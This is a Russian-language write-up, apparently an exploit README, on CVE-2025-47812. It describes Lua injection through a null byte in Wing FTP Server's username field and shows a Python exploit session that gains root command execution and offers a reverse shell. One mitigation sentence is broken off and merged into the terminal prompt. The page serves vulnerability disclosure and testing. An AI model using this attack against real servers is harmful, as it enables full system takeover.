
CVE-2025-47812
CVE-2025-47812 — это критическая уязвимость удалённого выполнения кода (RCE), затрагивающая Wing FTP Server версий до 7.4.4. Она была обнаружена исследователем безопасности, и подтверждено, что она активно эксплуатируется в реальных атаках.
Уязвимость кроется в логике аутентификации Wing FTP Server, а именно в том, как сервер обрабатывает нулевые байты (\0) в параметре username.
Злоумышленники могут внедрить произвольный Lua-код через поле имени пользователя, который сервер запишет в файл сессии. Когда этот файл сессии обрабатывается позже, внедрённый Lua-код выполняется, что позволяет злоумышленникам запускать команды на уровне системы.
/loginok.html для недоверенных сетей.┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
Этот эксплойт предоставлен только в образовательных целях. Используйте его ответственно и только на тех системах, на тестирование которых у вас есть явное разрешение. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.